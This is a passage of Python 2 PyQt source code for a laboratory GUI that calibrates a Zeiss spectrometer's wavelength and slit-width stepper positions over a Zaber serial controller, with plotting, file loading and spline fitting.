self.moveabsEdit = QtGui.QLineEdit(str(10000),self)
self.moveButton = QtGui.QPushButton('Move to nm',self)
self.moveButton.setStyleSheet('QPushButton {color: magenta}')
self.moveEdit = QtGui.QLineEdit("",self)
self.stopButton = QtGui.QPushButton('STOP MOVE',self)
##############################################
# status info which button has been pressed
self.zeiss_lbl = QtGui.QLabel("ZEISS alignment:", self)
self.zeiss_lbl.setStyleSheet("color: blue")
self.alignEdit = QtGui.QLineEdit("",self)
self.setzeroButton = QtGui.QPushButton('-> nm',self)
self.setzeroButton.setStyleSheet('QPushButton {color: magenta}')
self.setzeroButton.setFixedWidth(70)
#self.setzeroButton.setStyleSheet('QPushButton {color: black}')
##############################################
# status info which button has been pressed
self.zeiss_cal_lbl = QtGui.QLabel("ZEISS calibration:", self)
self.zeiss_cal_lbl.setStyleSheet("color: blue")
self.calibButton = QtGui.QPushButton('',self)
self.calibButton.setStyleSheet('QPushButton {color: magenta}')
self.calibSaveButton = QtGui.QPushButton('',self)
#self.reorderButton = QtGui.QPushButton('Reorder',self)
#self.reorderButton.setFixedWidth(65)
#self.reorderButton.setEnabled(False)
##############################################
self.timetrace_str = QtGui.QLabel("TIME trace for storing plots and data:", self)
self.timetrace_str.setStyleSheet("color: blue")
##############################################
self.lcd1 = QtGui.QLCDNumber(self)
self.lcd1.setStyleSheet("color: black")
self.lcd1.setSegmentStyle(QtGui.QLCDNumber.Flat)
self.lcd1.setNumDigits(6)
self.lcd2 = QtGui.QLCDNumber(self)
self.lcd2.setStyleSheet("color: magenta")
self.lcd2.setSegmentStyle(QtGui.QLCDNumber.Flat)
self.lcd2.setNumDigits(6)
#self.lcd2.setFixedWidth(120)
self.lcd3 = QtGui.QLCDNumber(self)
self.lcd3.setStyleSheet("color: red")
self.lcd3.setSegmentStyle(QtGui.QLCDNumber.Flat)
self.lcd3.setNumDigits(11)
self.lcd3.setFixedHeight(60)
self.lcd3.display(self.timestr)
##############################################
#g4_0=QtGui.QGridLayout()
#g4_0.addWidget(MyBar,0,0)
v4 = QtGui.QVBoxLayout()
#v4.addLayout(g4_0)
v4.addWidget(self.infoCalibButton)
g2_0 = QtGui.QSplitter(QtCore.Qt.Horizontal)
g2_0.addWidget(lb3)
g2_0.addWidget(self.cb3)
g8_1 = QtGui.QSplitter(QtCore.Qt.Vertical)
g8_1.addWidget(filename)
g8_1.addWidget(foldername)
g8_2 = QtGui.QSplitter(QtCore.Qt.Vertical)
g8_2.addWidget(self.filenameEdit)
g8_2.addWidget(self.folderEdit)
g8_3 = QtGui.QSplitter(QtCore.Qt.Horizontal)
g8_3.addWidget(g8_1)
g8_3.addWidget(g8_2)
v8 = QtGui.QSplitter(QtCore.Qt.Vertical)
v8.addWidget(g2_0)
v8.addWidget(g8_3)
g0_0 = QtGui.QSplitter(QtCore.Qt.Vertical)
g0_0.addWidget(self.motorstep_lbl)
g0_1 = QtGui.QSplitter(QtCore.Qt.Vertical)
g0_1.addWidget(self.upButton)
g0_1.addWidget(self.downButton)
g0_2 = QtGui.QSplitter(QtCore.Qt.Vertical)
g0_2.addWidget(self.lcd1)
h0 = QtGui.QSplitter(QtCore.Qt.Horizontal)
h0.addWidget(g0_1)
h0.addWidget(g0_2)
g0_3=QtGui.QSplitter(QtCore.Qt.Vertical)
g0_3.addWidget(self.moverelButton)
g0_3.addWidget(self.moveabsButton)
g0_3.addWidget(self.moveButton)
g0_4=QtGui.QSplitter(QtCore.Qt.Vertical)
g0_4.addWidget(self.moverelEdit)
g0_4.addWidget(self.moveabsEdit)
g0_4.addWidget(self.moveEdit)
g0_5=QtGui.QSplitter(QtCore.Qt.Vertical)
g0_5.addWidget(self.stopButton)
h1 = QtGui.QSplitter(QtCore.Qt.Horizontal)
h1.addWidget(g0_5)
h1.addWidget(g0_3)
h1.addWidget(g0_4)
v1 = QtGui.QSplitter(QtCore.Qt.Vertical)
v1.addWidget(g0_0)
v1.addWidget(h0)
v1.addWidget(h1)
g3_0=QtGui.QSplitter(QtCore.Qt.Vertical)
g3_0.addWidget(self.zeiss_lbl)
g3_1=QtGui.QSplitter(QtCore.Qt.Vertical)
g3_1.addWidget(self.alignEdit)
g3_1.addWidget(self.setzeroButton)
g3_2=QtGui.QSplitter(QtCore.Qt.Horizontal)
g3_2.addWidget(g3_1)
g3_2.addWidget(self.lcd2)
h4 = QtGui.QSplitter(QtCore.Qt.Vertical)
h4.addWidget(g3_0)
h4.addWidget(g3_2)
g5_0=QtGui.QSplitter(QtCore.Qt.Vertical)
g5_0.addWidget(self.zeiss_cal_lbl)
g5_1=QtGui.QSplitter(QtCore.Qt.Horizontal)
g5_1.addWidget(self.calibButton)
g5_1.addWidget(self.calibSaveButton)
h5 = QtGui.QSplitter(QtCore.Qt.Vertical)
h5.addWidget(g5_0)
h5.addWidget(g5_1)
g9_0 = QtGui.QSplitter(QtCore.Qt.Vertical)
g9_0.addWidget(self.timetrace_str)
g9_0.addWidget(self.lcd3)
# SET ALL VERTICAL COLUMNS TOGETHER
v_all = QtGui.QVBoxLayout()
v_all.addLayout(v4)
v_all.addWidget(v8)
v_all.addWidget(h4)
v_all.addWidget(h5)
v_all.addWidget(v1)
v_all.addWidget(g9_0)
# set graph and toolbar to a new vertical group vcan
pw = pg.GraphicsLayoutWidget()
pw.setFixedWidth(750)
self.p0 = pw.addPlot()
self.p0.setTitle('Ref calib file')
self.p0.setLabel('left', u'\u03bb', units='m')
self.p0.setLabel('bottom', 'stepper micropos.')
self.p1 = pw.addPlot()
self.p1.setTitle('New calib file')
self.p1.setLabel('left', u'\u03bb', units='m')
self.p1.setLabel('bottom', 'stepper micropos.')
# SET ALL VERTICAL COLUMNS TOGETHER
h_all = QtGui.QHBoxLayout()
h_all.addLayout(v_all)
h_all.addWidget(pw)
self.setLayout(h_all)
########################################
# create plot and add it to the figure canvas
self.p0.addLegend()
#self.curve0=self.p0.plot(pen='r')
self.curve0_1=self.p0.plot(pen='m',name='raw data')
self.curve0_2=self.p0.plot(pen='b',name='spline')
#self.p0.setDownsampling(mode='peak')
#self.p0.setClipToView(True)
# PLOT 3 settings
self.p1.addLegend()
self.curve2=self.p1.plot(pen='m',name='raw data')
#self.curve1=self.p1.plot(pen='b',name='spline')
#self.curve3=self.p1.plot(pen='w',name='scan')
#########################################
self.calibSaveButton.clicked.connect(self.add_calib)
self.calibButton.clicked.connect(self.move_to_val2)
self.calibButton.clicked.connect(self.update_calib_button)
self.setzeroButton.clicked.connect(self.set_zero)
self.cb3.activated[str].connect(self.onActivated3)
#self.reorderButton.clicked.connect(self.set_reorder)
self.upButton.clicked.connect(self.move_jog)
self.downButton.clicked.connect(self.move_jog)
self.moverelButton.clicked.connect(self.move_rel)
self.moveabsButton.clicked.connect(self.move_abs)
self.moveButton.clicked.connect(self.move_to_val)
self.stopButton.clicked.connect(self.move_stop)
self.infoCalibButton.clicked.connect(self.showInfoCalibFiles)
#self.move(0,175)
#self.setWindowTitle('Zeiss spectrometer calibration')
self.show()
self.allButtons_torf(False)
self.stopButton.setEnabled(False)
self.bad_zaber_vals=False
self.calib_mode="wavelength"
self.set_lambda_calib_data()
self.loadWaveCalibValues()
##########################################
def ZaberDialog(self):
text, ok = QtGui.QInputDialog.getText(self, 'Serial Port Dialog','Enter Zaber stepper serial:', text=self.zaberport_str)
if ok:
self.zaberport_str = str(text)
    def loadCalibLambdaDialog(self):
        """Pick a reference wavelength-calibration file via a file dialog.

        On success the new path is stored and the info popup is shown; on a
        parse error the previous path is restored.  If the GUI is currently
        in wavelength mode, the calibration plot is rebuilt from the file.
        """
        fname = QtGui.QFileDialog.getOpenFileName(self, 'Load ref wavelength calib','Calib_files')
        # Remember the old path so we can roll back if the new file is bad.
        old_calib=self.calibfile_lambda_str
        if fname:
            try:
                self.calibfile_lambda_str = str(fname)
                # showInfoCalibFiles() parses both calib files and is what
                # can raise ValueError for a malformed file.
                self.showInfoCalibFiles()
            except ValueError as e:
                self.calibfile_lambda_str = old_calib
                QtGui.QMessageBox.warning(self, 'Message', "Something is wrong with lambda calib file! Do you have a file with 2 columns, no headers, and all inputs are digits?")
                return
            if self.calib_mode=="wavelength":
                self.set_lambda_calib_data()
def loadWaveDialog(self):
fname = QtGui.QFileDialog.getOpenFileName(self, 'Load wavelength vals for calib','Calib_files')
if fname:
self.lambda_str = str(fname)
if self.calib_mode=="wavelength":
self.loadWaveCalibValues()
def loadWaveCalibValues(self):
try:
self.y_local=[]
self.calibCounter=0
with open(self.lambda_str, 'r') as thefile:
for line in thefile:
columns = line.split()
self.y_local.extend([round(float(columns[0]),1)])
except ValueError as e:
QtGui.QMessageBox.warning(self, 'Message',"Something is wrong with the wavelength file! Do you have a wavelength file with 1 column, no headers, and all inputs are digits?")
self.calibButton.setText('Adjust to ---- nm')
self.calibButton.setEnabled(False)
self.calibSaveButton.setEnabled(False)
self.calibButton.setText(''.join(['Adjust to ',str(self.y_local[self.calibCounter]),' nm']))
self.val_point=self.y_local[self.calibCounter]
self.calibSaveButton.setText(''.join(['Save at ',str(self.val_point),' nm' ]))
#self.calibCounter+=1
    def loadCalibSlitDialog(self):
        """Pick a reference slit-width calibration file via a file dialog.

        Mirrors loadCalibLambdaDialog: store the new path, show the info
        popup, roll back on a parse error, and rebuild the plot when the
        GUI is in slit mode.
        """
        fname = QtGui.QFileDialog.getOpenFileName(self, 'Load ref slit width calib','Calib_files')
        # Remember the old path so we can roll back if the new file is bad.
        old_calib=self.calibfile_slit_str
        if fname:
            try:
                self.calibfile_slit_str = str(fname)
                self.showInfoCalibFiles()
            except ValueError as e:
                self.calibfile_slit_str = old_calib
                QtGui.QMessageBox.warning(self, 'Message', "Something is wrong with slit calib file! Do you have a file with 2 columns, no headers, and all inputs are digits?")
                return
            if self.calib_mode=="slit":
                self.set_slit_calib_data()
def loadSlitDialog(self):
fname = QtGui.QFileDialog.getOpenFileName(self, 'Load slit width vals for calib','Calib_files')
if fname:
self.slit_str = str(fname)
if self.calib_mode=="slit":
self.loadSlitCalibValues()
def loadSlitCalibValues(self):
try:
self.y_local=[]
self.calibCounter=0
with open(self.slit_str, 'r') as thefile:
for line in thefile:
columns = line.split()
self.y_local.extend([round(float(columns[0]),2)])
except Exception, e:
QtGui.QMessageBox.warning(self, 'Message',"Something is wrong with the slit width file! Do you have a slit width file with 1 column, no headers, and all inputs are digits?")
self.calibButton.setText('Adjust to ---- mm')
self.calibButton.setEnabled(False)
self.calibSaveButton.setEnabled(False)
self.calibButton.setText(''.join(['Adjust to ',str(self.y_local[self.calibCounter]),' mm']))
self.val_point=self.y_local[self.calibCounter]
self.calibSaveButton.setText(''.join(['Save at ',str(self.val_point),' mm' ]))
#self.calibCounter+=1
    def showInfoCalibFiles(self):
        """Show a popup summarising both reference calibration files.

        Parses the lambda and slit calib files (two whitespace-separated
        columns: microstep position, value) and displays their names and
        value ranges.  The int()/float() conversions here are what raise
        ValueError for malformed files, which the load dialogs rely on.
        """
        head, tail1 = os.path.split(self.calibfile_lambda_str)
        head, tail2 = os.path.split(self.calibfile_slit_str)
        x0=[]
        y0=[]
        with open(self.calibfile_lambda_str, 'r') as thefile:
            for line in thefile:
                columns = line.split()
                x0.extend([int(columns[0])]) #microstep pos.
                y0.extend([round(float(columns[1]),1)]) #wavelength
        x1=[]
        y1=[]
        with open(self.calibfile_slit_str, 'r') as thefile:
            for line in thefile:
                columns = line.split()
                x1.extend([int(columns[0])]) #microstep pos.
                y1.extend([round(float(columns[1]),2)]) #wavelength
        # Rich-text message: lambda info in green, slit info in blue.
        QtGui.QMessageBox.information(self, "Drive files information",''.join(["<font color=\"black\">Calib lambda: </font> <font color=\"green\">",tail1,"< </font> <br> <font color=\"black\">Calib lambda range: </font> <font color=\"green\">",str(y0[0])," to ",str(y0[-1])," nm < </font> <br> <font color=\"black\">Calib slit:< </font> <font color=\"blue\">",tail2,"< </font> <br> <font color=\"black\">Calib slit range: </font> <font color=\"blue\">",str(y1[0])," to ",str(y1[-1])," mm <" ]))
    def set_connect(self):
        """Open the Zaber controller and configure both stepper axes.

        Axis 1 drives the wavelength, axis 2 the slit.  Sets travel limits,
        hold/running currents and max speed, restores the last saved
        positions from config_zeiss, prints a settings summary, enables the
        GUI and arms a 10-minute inactivity auto-disconnect timer.
        """
        try:
            self.Za = ZaberXmcb_ascii.Zaber_Xmcb(self.zaberport_str)
        except Exception as e:
            QtGui.QMessageBox.warning(self, 'Message',"No response from the Zaber serial port! Check the serial port name and connections.")
            return
        # constants
        min_pos_lambda=self.Validrange_lambda[0]
        max_pos_lambda=self.Validrange_lambda[1]
        min_pos_slit=self.Validrange_slit[0]
        max_pos_slit=self.Validrange_slit[1]
        # hc/rc are in units of 25 mA (see the printout below); ms is in
        # units of 1/1.6384 microsteps/s -- stepper controller conventions.
        hc=25
        rc=50
        ms=2048
        try:
            self.Za.set_timeout(0.5)
            # Axis 1: wavelength drive.
            self.Za.set_Maximum_Position(1,1,max_pos_lambda)
            self.Za.set_Minimum_Position(1,1,min_pos_lambda)
            self.Za.set_Hold_Current(1,1,hc)
            self.Za.set_Running_Current(1,1,rc)
            self.Za.set_Max_Speed(1,1,ms)
            # Enable user to edit advanced settings
            #self.Za.set_System_Access(1,2) # OPEN ADVANCED
            #self.Za.set_Motor_Dir(1,2,1) # REVERSE motor direction
            #self.Za.set_System_Access(1,1) # CLOSE ADVANCED
            # Axis 2: slit drive.
            self.Za.set_Maximum_Position(1,2,max_pos_slit)
            self.Za.set_Minimum_Position(1,2,min_pos_slit)
            self.Za.set_Hold_Current(1,2,hc)
            self.Za.set_Running_Current(1,2,rc)
            self.Za.set_Max_Speed(1,2,ms)
            micstep=self.Za.return_Microstep_Resolution(1,1)
            sc=self.Za.return_System_Current(1)
            # TURN ON/OFF ALERTS
            if self.Za.return_Alert(1)==0:
                self.Za.set_Alert(1,1)
            # Restore the positions persisted in config_zeiss.py.
            self.Za.set_Current_Position(1,1,config_zeiss.Last_position_lambda[0])
            self.Za.set_Current_Position(1,2,config_zeiss.Last_position_slit[0])
        except Exception as e:
            self.Za.close()
            QtGui.QMessageBox.warning(self, 'Message',"No response from the Zaber stepper! Is stepper powered and connected to the serial?")
            return None
        # Print a human-readable summary of the applied settings.
        hc_str=''.join([str(hc*25e-3)," / ",str(rc*25e-3)," Amps" ])
        print "Hold / Running current:", hc_str
        sys_str=''.join([ str(sc), " Amps" ])
        print "System current (0-5):", sys_str
        ms_str=''.join([str(ms/1.6384), " microsteps/s"])
        print "Max speed:", ms_str
        micstep_str=''.join([str(micstep), " microsteps/step"])
        print "Microstep resolution:", str(micstep_str)
        pos_lambda_str=''.join([str(min_pos_lambda)," to ", str(max_pos_lambda)," microsteps"])
        print "Stepper range for the wavelengths:", pos_lambda_str
        pos_slit_str=''.join([str(min_pos_slit)," to ", str(max_pos_slit)," microsteps"])
        print "Stepper range for the slits:", pos_slit_str
        # Unlock the GUI now that the hardware is live.
        self.allButtons_torf(True)
        self.stopButton.setEnabled(False)
        self.conMode.setEnabled(False)
        self.serialZaber.setEnabled(False)
        if self.calib_mode=="wavelength":
            self.set_lambda_calib_data()
        elif self.calib_mode=="slit":
            self.set_slit_calib_data()
        # Auto-disconnect after 10 minutes of inactivity (single shot;
        # restarted by set_finished after each completed move).
        self.timer = QTimer(self)
        self.connect(self.timer, SIGNAL("timeout()"), self.set_disconnect)
        self.timer.setSingleShot(True)
        self.timer.start(1000*60*10)
    def set_disconnect(self):
        """Drop both hold currents, close the serial link and lock the GUI.

        Hold currents are zeroed so the motors do not heat up while idle.
        """
        self.Za.set_Hold_Current(1,1,0)
        self.Za.set_Hold_Current(1,2,0)
        self.Za.close()
        self.allButtons_torf(False)
        self.conMode.setEnabled(True)
def allButtons_torf(self,trueorfalse):
self.calibWaveZeiss.setEnabled(trueorfalse)
self.waveZeiss.setEnabled(trueorfalse)
self.calibSlitZeiss.setEnabled(trueorfalse)
self.slitZeiss.setEnabled(trueorfalse)
self.disconMode.setEnabled(trueorfalse)
self.calibButton.setEnabled(trueorfalse)
self.alignEdit.setEnabled(trueorfalse)
self.setzeroButton.setEnabled(trueorfalse)
self.calibSaveButton.setEnabled(trueorfalse)
self.cb3.setEnabled(trueorfalse)
self.infoCalibButton.setEnabled(trueorfalse)
#self.reorderButton.setEnabled(trueorfalse)
self.filenameEdit.setEnabled(trueorfalse)
self.folderEdit.setEnabled(trueorfalse)
self.upButton.setEnabled(trueorfalse)
self.downButton.setEnabled(trueorfalse)
self.moverelButton.setEnabled(trueorfalse)
self.moveabsButton.setEnabled(trueorfalse)
self.moveButton.setEnabled(trueorfalse)
self.moverelEdit.setEnabled(trueorfalse)
self.moveabsEdit.setEnabled(trueorfalse)
self.moveEdit.setEnabled(trueorfalse)
#self.stopButton.setEnabled(trueorfalse)
##########################################
def set_bstyle_v1(self,button):
button.setStyleSheet('QPushButton {font-size: 25pt}')
button.setFixedWidth(40)
button.setFixedHeight(40)
    def onActivated3(self, text):
        """Handle the calibration-mode combo box (wavelength / slit).

        After user confirmation, switches plot labels, button captions and
        the position history to the chosen mode, reloads the relevant calib
        data and persists the choice.  On refusal the combo box is snapped
        back to the other entry.
        """
        if str(text)=="wavelength":
            reply = QtGui.QMessageBox.question(self, 'Message', "Do you want to calibrate wavelengths stepper positions?", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
            if reply == QtGui.QMessageBox.Yes:
                self.calib_mode="wavelength"
                # Left axes now show wavelength (Greek lambda) in metres.
                self.p0.setLabel('left', u'\u03bb', units='m')
                self.p1.setLabel('left', u'\u03bb', units='m')
                self.setzeroButton.setText("-> nm")
                self.moveButton.setText("Move to nm")
                # Restart the position history from the persisted position.
                self.all_pos=[config_zeiss.Last_position_lambda[0]]
                self.set_lambda_calib_data()
                self.loadWaveCalibValues()
                self.curve2.clear()
                self.set_save()
            else:
                # User declined: revert the combo box to "slit".
                self.cb3.setCurrentIndex(1)
        elif str(text)=="slit":
            reply = QtGui.QMessageBox.question(self, 'Message', "Do you want to calibrate slit widths stepper positions?", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
            if reply == QtGui.QMessageBox.Yes:
                self.calib_mode="slit"
                self.p0.setLabel('left', 'slit width', units='m')
                self.p1.setLabel('left', 'slit width', units='m')
                self.setzeroButton.setText("-> mm")
                self.moveButton.setText("Move to mm")
                self.all_pos=[config_zeiss.Last_position_slit[0]]
                self.set_slit_calib_data()
                self.loadSlitCalibValues()
                self.curve2.clear()
                self.set_save()
            else:
                # User declined: revert the combo box to "wavelength".
                self.cb3.setCurrentIndex(0)
def add_calib(self):
if str(self.filenameEdit.text()):
saveinfile=''.join([str(self.filenameEdit.text()),'_',self.timestr])
else:
saveinfile=''.join(["calib_",self.timestr])
if str(self.folderEdit.text()):
if not os.path.isdir(str(self.folderEdit.text())):
os.mkdir(str(self.folderEdit.text()))
saveinfolder=''.join([str(self.folderEdit.text()),"/"])
else:
saveinfolder=""
save_to_file=''.join([saveinfolder,saveinfile,".txt"])
if not os.path.exists(save_to_file):
print "Calib file created: ", save_to_file
with open(save_to_file, 'w') as thefile:
pass
with open(save_to_file, 'r') as thefile:
# read a list of lines into data
data = thefile.readlines()
if data and str(self.val_point) in data[-1]:
if self.calib_mode=="wavelength":
data[-1]=''.join([str(self.all_pos[-1]),'\t',str(self.val_point),'\n'])
elif self.calib_mode=="slit":
data[-1]=''.join([str(self.all_pos[-1]),'\t',str(self.val_point),'\n'])
with open(save_to_file, 'w') as thefile:
thefile.writelines(data)
else:
if self.calib_mode=="wavelength":
with open(save_to_file, 'a') as thefile:
thefile.write('%s' %self.all_pos[-1] )
thefile.write('\t%s\n' %self.val_point)
elif self.calib_mode=="slit":
with open(save_to_file, 'a') as thefile:
thefile.write('%s' %self.all_pos[-1] )
thefile.write('\t%s\n' %self.val_point)
# open calib file and plot
x=[]
y=[]
with open(save_to_file, 'r') as thefile:
for line in thefile:
columns = line.split()
x.extend([int(columns[0])])
if self.calib_mode=="wavelength":
y.extend([round(float(columns[1]),1)])
elif self.calib_mode=="slit":
y.extend([round(float(columns[1]),2)])
if self.calib_mode=="wavelength":
self.curve2.setData(x,numpy.array(y)/1.0e9)
elif self.calib_mode=="slit":
self.curve2.setData(x,numpy.array(y)/1.0e3)
#self.reorderButton.setEnabled(True)
def update_calib_button(self):
if self.calib_mode=="wavelength":
if len(self.y_local)-1>self.calibCounter:
self.val_point=self.y_local[self.calibCounter]
self.calibSaveButton.setText(''.join(['Save at ',str(self.val_point),' nm' ]))
self.calibCounter+=1
self.calibButton.setText(''.join(['Adjust to ',str(self.y_local[self.calibCounter]),' nm']))
else:
self.val_point=self.y_local[self.calibCounter]
self.calibSaveButton.setText(''.join(['Save at ',str(self.val_point),' nm' ]))
self.calibCounter=0
self.calibButton.setText(''.join(['Adjust to ',str(self.y_local[self.calibCounter]),' nm']))
elif self.calib_mode=="slit":
if len(self.y_local)-1>self.calibCounter:
self.val_point=self.y_local[self.calibCounter]
self.calibSaveButton.setText(''.join(['Save at ',str(self.val_point),' mm' ]))
self.calibCounter+=1
self.calibButton.setText(''.join(['Adjust to ',str(self.y_local[self.calibCounter]),' mm']))
else:
self.val_point=self.y_local[self.calibCounter]
self.calibSaveButton.setText(''.join(['Save at ',str(self.val_point),' mm' ]))
self.calibCounter=0
self.calibButton.setText(''.join(['Adjust to ',str(self.y_local[self.calibCounter]),' mm']))
'''
def set_reorder(self):
if os.path.exists(self.filenameEdit.text()):
# open calib file and get all x and y
x=[]
y=[]
with open(self.save_to_file, 'r') as thefile:
for line in thefile:
columns = line.split()
x.extend([int(columns[0])])
y.extend([round(float(columns[1]),1)])
# sort x element and their respective y
sort_index = numpy.argsort(x)
sort_x=[]
sort_y=[]
with open(self.save_to_file, 'w') as thefile:
for i in sort_index:
thefile.write('%s\t' %x[i])
thefile.write('%s\n' %y[i])
sort_x.extend([ x[i] ])
sort_y.extend([ y[i] ])
self.curve2.setData(sort_x,sort_y)
#self.alignEdit.setText('')
else:
print "Warning! The calib file path does not exists!"
'''
    def set_lambda_calib_data(self):
        """Load the reference lambda calib file and rebuild the left plot.

        Reads (microstep, wavelength-nm) pairs, validates the stepper range,
        plots raw points plus a cubic-spline fit, and refreshes the LCDs
        with the wavelength matching the last known stepper position.  Also
        persists that position to config_zeiss.py.
        """
        try:
            x=[]
            y=[]
            with open(self.calibfile_lambda_str, 'r') as thefile:
                for line in thefile:
                    columns = line.split()
                    x.extend([int(columns[0])])
                    y.extend([round(float(columns[1]),1)])
        except ValueError as e:
            QtGui.QMessageBox.warning(self, 'Message',"Something is wrong with the ref calib file! Do you have a ref Calib file with 2 columns, no headers, and all inputs are numbers?")
            return
        # These bounds are what set_zero/move_to_val validate user input against.
        self.min_y_calib=min(y)
        self.max_y_calib=max(y)
        if min(x)<self.Validrange_lambda[0] or max(x)>self.Validrange_lambda[1]:
            QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid wavelength stepper range is from ',str(self.Validrange_lambda[0]),' to ',str(self.Validrange_lambda[1]),' microsteps.' ]) )
            return
        # Raw calibration points (y is converted from nm to metres for the axis).
        self.curve0_1.setData(x,numpy.array(y)/1.0e9)
        wv_fine=numpy.arange(y[0],y[-1]+0.1,0.1)
        #spline
        wv_curve=scipy.interpolate.splrep(y, x, k=3, s=0)
        #linear
        #wv_curve = scipy.interpolate.splrep(y, x, k=1, s=0)
        positions_fine = scipy.interpolate.splev(wv_fine, wv_curve, der=0)
        self.curve0_2.setData(positions_fine,numpy.array(wv_fine)/1.0e9)
        my_pos = self.all_pos[-1]
        if my_pos<min(x) or my_pos>max(x):
            QtGui.QMessageBox.warning(self, 'Message', "Current wavelength position is outside range of the calibration lambda file!")
            self.lcd1.display('-')
            self.lcd2.display('-')
        else:
            # Update the LCD display lcd2 with the wavelength which
            # corresponds to the saved Zaber microposition
            wv_curve2=scipy.interpolate.splrep(x, y, k=3, s=0)
            first_pos_val = round(scipy.interpolate.splev(my_pos, wv_curve2, der=0), 1)
            lcd_obj=type('lcd_obj',(object,),{'min_pos':my_pos, 'pos_val':first_pos_val})
            self.more_tals(lcd_obj)
            # Line 4 of config_zeiss.py holds Last_position_lambda.
            self.replace_line("config_zeiss.py",4,''.join(["Last_position_lambda=[",str(my_pos),",",str(first_pos_val),"]\n"]))
            imp.reload(config_zeiss)
    def set_slit_calib_data(self):
        """Load the reference slit calib file and rebuild the left plot.

        Mirror of set_lambda_calib_data for the slit axis: reads
        (microstep, slit-width-mm) pairs, validates the stepper range,
        plots raw points plus a cubic-spline fit, refreshes the LCDs and
        persists the last position to config_zeiss.py.
        """
        try:
            x=[]
            y=[]
            with open(self.calibfile_slit_str, 'r') as thefile:
                for line in thefile:
                    columns = line.split()
                    x.extend([int(columns[0])])
                    y.extend([round(float(columns[1]),2)])
        except ValueError as e:
            QtGui.QMessageBox.warning(self, 'Message',"Something is wrong with the ref calib file! Do you have a ref Calib file with 2 columns, no headers, and all inputs are numbers?")
            return
        # These bounds are what set_zero/move_to_val validate user input against.
        self.min_y_calib=min(y)
        self.max_y_calib=max(y)
        if min(x)<self.Validrange_slit[0] or max(x)>self.Validrange_slit[1]:
            QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid slit stepper range is from ',str(self.Validrange_slit[0]),' to ',str(self.Validrange_slit[1]),' microsteps.' ]) )
            return
        # Raw calibration points (y is converted from mm to metres for the axis).
        self.curve0_1.setData(x,numpy.array(y)/1.0e3)
        slit_fine=numpy.arange(y[0],y[-1]+0.01,0.01)
        #spline
        slit_curve=scipy.interpolate.splrep(y, x, k=3, s=0)
        #linear
        #slit_curve = scipy.interpolate.splrep(y, x, k=1, s=0)
        positions_fine = scipy.interpolate.splev(slit_fine, slit_curve, der=0)
        self.curve0_2.setData(positions_fine,numpy.array(slit_fine)/1.0e3)
        my_pos = self.all_pos[-1]
        if my_pos<min(x) or my_pos>max(x):
            QtGui.QMessageBox.warning(self, 'Message', "Current slit position is outside range of the calibration slit file!")
            self.lcd1.display('-')
            self.lcd2.display('-')
        else:
            # Update the LCD display lcd2 with the wavelength which
            # corresponds to the saved Zaber microposition
            wv_curve2=scipy.interpolate.splrep(x, y, k=3, s=0)
            first_pos_val = round(scipy.interpolate.splev(my_pos, wv_curve2, der=0), 2)
            lcd_obj=type('lcd_obj',(object,),{'min_pos':my_pos, 'pos_val':first_pos_val})
            self.more_tals(lcd_obj)
            # Line 5 of config_zeiss.py holds Last_position_slit.
            self.replace_line("config_zeiss.py",5,''.join(["Last_position_slit=[",str(my_pos),",",str(first_pos_val),"]\n"]))
            imp.reload(config_zeiss)
    def move_stop(self):
        """Abort the stepper move currently running in the worker thread."""
        self.get_zaber_Thread.abort_move()
    def set_zero(self):
        """Tag the current stepper position with the value typed in alignEdit.

        Parses the user value (nm or mm depending on mode), checks it is
        within the reference calib range, then hands it to a zaber_Thread
        identified by the sender button's caption.  Note this handler does
        not lock the GUI buttons (unlike move_to_val), so it must stay quick.
        """
        if self.calib_mode=="wavelength":
            try:
                move_num=round(float(self.alignEdit.text()),1)
            except ValueError as e:
                QtGui.QMessageBox.warning(self, 'Message', "Only real decimal numbers are accepted as a wavelength!")
                return
            if move_num<self.min_y_calib or move_num>self.max_y_calib:
                QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid wavelength range is from ',str(self.min_y_calib),' nm to ',str(self.max_y_calib),' nm.' ]) )
                return
            else:
                # Pause the auto-disconnect timer while the thread works.
                self.timer.stop()
                sender = self.sender()
                self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_lambda_str,move_num)
        elif self.calib_mode=="slit":
            try:
                move_num=round(float(self.alignEdit.text()),2)
            except ValueError as e:
                QtGui.QMessageBox.warning(self, 'Message', "Only real decimal numbers are accepted as a slit width!")
                return
            if move_num<self.min_y_calib or move_num>self.max_y_calib:
                QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid slit range is from ',str(self.min_y_calib),' mm to ',str(self.max_y_calib),' mm.' ]) )
                return
            else:
                self.timer.stop()
                sender = self.sender()
                self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_slit_str,move_num)
        # Wire the worker-thread signals to the GUI callbacks and start it.
        self.connect(self.get_zaber_Thread,SIGNAL("more_tals(PyQt_PyObject)"),self.more_tals)
        self.connect(self.get_zaber_Thread,SIGNAL('bad_zaber_val(PyQt_PyObject)'), self.bad_zaber_val)
        self.connect(self.get_zaber_Thread,SIGNAL('finished()'), self.set_finished)
        self.get_zaber_Thread.start()
    def move_to_val(self):
        """Move the stepper to the value (nm or mm) typed in moveEdit.

        Validates the input against the reference calib range, locks the
        GUI (enabling only Stop), and starts a zaber_Thread that performs
        the move; set_finished re-enables the GUI when it completes.
        """
        if self.calib_mode=="wavelength":
            try:
                move_num=round(float(self.moveEdit.text()),1)
            except ValueError as e:
                QtGui.QMessageBox.warning(self, 'Message', "Only real decimal numbers are accepted as a wavelength!")
                return
            if move_num<self.min_y_calib or move_num>self.max_y_calib:
                QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid wavelength range is from ',str(self.min_y_calib),' nm to ',str(self.max_y_calib),' nm.' ]) )
                return
            else:
                # Pause the auto-disconnect timer while the thread works.
                self.timer.stop()
                sender = self.sender()
                self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_lambda_str,move_num)
        elif self.calib_mode=="slit":
            try:
                move_num=round(float(self.moveEdit.text()),2)
            except ValueError as e:
                QtGui.QMessageBox.warning(self, 'Message', "Only real decimal numbers are accepted as a slit width!")
                return
            if move_num<self.min_y_calib or move_num>self.max_y_calib:
                QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid slit width range is from ',str(self.min_y_calib),' mm to ',str(self.max_y_calib),' mm.' ]) )
                return
